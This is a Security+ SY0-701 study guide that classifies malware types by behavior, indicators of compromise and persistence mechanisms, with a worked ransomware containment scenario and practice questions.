Malware Behaviors and Indicators
Key Takeaways
- SY0-701 tests malware by behavior, impact, and indicators of compromise, then asks for the best containment or mitigation step.
- Ransomware encrypts or exfiltrates data for extortion; worms self-propagate; Trojans hide malicious functions inside apparently useful software.
- Fileless malware abuses trusted tools such as PowerShell and Windows Management Instrumentation, executing in memory to minimize disk artifacts.
- Rootkits and bootkits prioritize stealth and persistence, while spyware and keyloggers prioritize collection of data and keystrokes.
- Strong indicators include anomalous process trees, fixed-interval network beacons, persistence registry changes, mass file writes, and impossible-travel logins.
How the Exam Frames Malware
Malware (malicious software) is tested on SY0-701 by behavior far more than by vocabulary. The 90-question exam (90 minutes, passing score 750 on a 100-900 scale) rarely asks "define a worm." It describes what code does - encrypts files, steals credentials, hides itself, spreads without help, opens remote control, or abuses a trusted process - and asks you to name it or pick the best response. Read the scenario for behavior first, then map it to a type.
| Malware type | Primary behavior | Common indicators | First mitigation focus |
|---|---|---|---|
| Virus | Attaches to files and needs execution | Modified files, unexpected hash changes | Remove infected files, restore clean copies |
| Worm | Self-propagates across systems with no user action | Rapid port scanning, repeated SMB (port 445) connections | Segment network, block the propagation path, patch the flaw |
| Trojan | Pretends to be legitimate software | Unknown app, unexpected outbound sessions | Remove the app, reimage if trust is lost |
| Ransomware | Encrypts and often exfiltrates data first | File renames, ransom note, mass write activity | Isolate host, disable compromised account, preserve evidence |
| Spyware | Secretly collects user or system data | Browser hijack, unusual data uploads | Remove software, review endpoint controls |
| Keylogger | Captures keystrokes or form input | Credential theft, suspicious input hooks | Reset exposed credentials from a clean device |
| Rootkit | Hides processes, files, or privileges | Security-tool blind spots, kernel anomalies | Rebuild from trusted media when integrity is uncertain |
| Backdoor / RAT | Provides unauthorized remote access | Beaconing, new listener, remote shell activity | Block command-and-control, isolate, rotate credentials |
| Logic bomb | Triggers on a date or event condition | Timed or event-based destructive action | Code review, change control, remove the trigger |
| Cryptominer | Hijacks CPU/GPU for cryptocurrency | Sustained high CPU/GPU, mining-pool connections | Remove process, close initial access vector |
Behavior Patterns and Fileless Malware
Fileless malware is a high-yield topic: it lives in memory and abuses trusted, signed binaries (a technique called living-off-the-land) so traditional signature antivirus sees little. PowerShell with an encoded -enc command line, wmic, mshta, and rundll32 are classic indicators. The behavior, not the file, is the giveaway.
| Observed behavior | What it suggests |
|---|---|
| Mass file encryption with extension renames | Ransomware or destructive wiper |
| Credential access from LSASS memory or browser stores | Infostealer or post-exploitation tool |
| New scheduled task or Run-key registry value | Persistence mechanism |
| PowerShell downloading and decoding content | Fileless / staged payload |
| DNS queries to a random-looking domain every 60 seconds | Command-and-control beaconing |
| Lateral movement using admin shares (C$, ADMIN$) | Compromised privileged credentials |
Worked Scenario
A workstation logs this sequence:
| Time | Evidence |
|---|---|
| 09:12 | User opens invoice_viewer.exe from an email attachment |
| 09:13 | powershell.exe starts with an encoded command line |
| 09:14 | Dozens of documents are renamed with a new extension |
| 09:15 | File-server logs show the same user modifying shared files |
The chain points to a Trojan-delivered loader, fileless PowerShell staging, and ransomware impact spreading to a share. The best immediate action is containment: isolate the endpoint from the network, disable or reset the compromised account, and revoke access to affected shares. The incident-response order the exam rewards is preparation, identification, containment, eradication, recovery, lessons learned. Restoring from backup is recovery - it comes only after eradication, because restoring into a network where the root cause is still active simply reinfects the clean data.
Common Traps
| Distractor | Better exam reasoning |
|---|---|
| "Run antivirus only" while malware is actively spreading | Contain first when active spread is confirmed; signature AV misses fileless |
| "Restore backups" before the infection path is closed | Recovery can be reinfected if root cause remains |
| "Delete logs to save disk space" | Preserve evidence and the timeline for forensics and legal hold |
| "A rootkit can be cleaned in place" | Rebuild from trusted media if system integrity cannot be trusted |
Persistence and Stealth Mechanisms
Beyond the initial infection, exam scenarios test how malware stays. Persistence keeps the malware running across reboots and logoffs, while stealth hides it from defenders. Recognizing these mechanisms in a description lets you classify the threat and choose eradication that actually removes it rather than just killing a single process.
| Mechanism | Where it lives | Why it matters |
|---|---|---|
| Run / RunOnce registry keys | Windows registry autostart | Re-launches malware at every login |
| Scheduled task or cron job | OS task scheduler | Survives reboot; can trigger on a timer |
| Service installation | New Windows service or daemon | Runs with high privilege at boot |
| Bootkit / UEFI implant | Boot firmware or MBR | Loads before the OS and antivirus |
| DLL search-order hijack | Application load path | Injects code into a trusted process |
| Rootkit hooking | Kernel or user-mode APIs | Hides files, processes, and connections |
A potentially unwanted program (PUP) is a softer category - adware or bundled toolbars that are not overtly malicious but degrade the system and may track users. The exam contrasts PUPs with true malware to test whether you over-escalate a low-severity finding.
Quick Drill
Name the likely behavior for each clue: (1) hundreds of connection attempts to TCP 445 across subnets - worm propagation or lateral movement; (2) credentials used from a new country minutes after a normal session - infostealer or keylogger; (3) small encrypted packets to one external host every 60 seconds - C2 beaconing; (4) a process invisible to security tools but proven active in network logs - rootkit or tampering; (5) a new service that re-spawns the payload after every reboot - persistence via service installation.
A workstation suddenly renames thousands of files with a new extension and drops a note demanding payment. What malware behavior is most likely?
An analyst confirms a host is actively encrypting shared folders right now. What should be done first?
Which indicators most strongly suggest command-and-control activity? Select two.
Select all that apply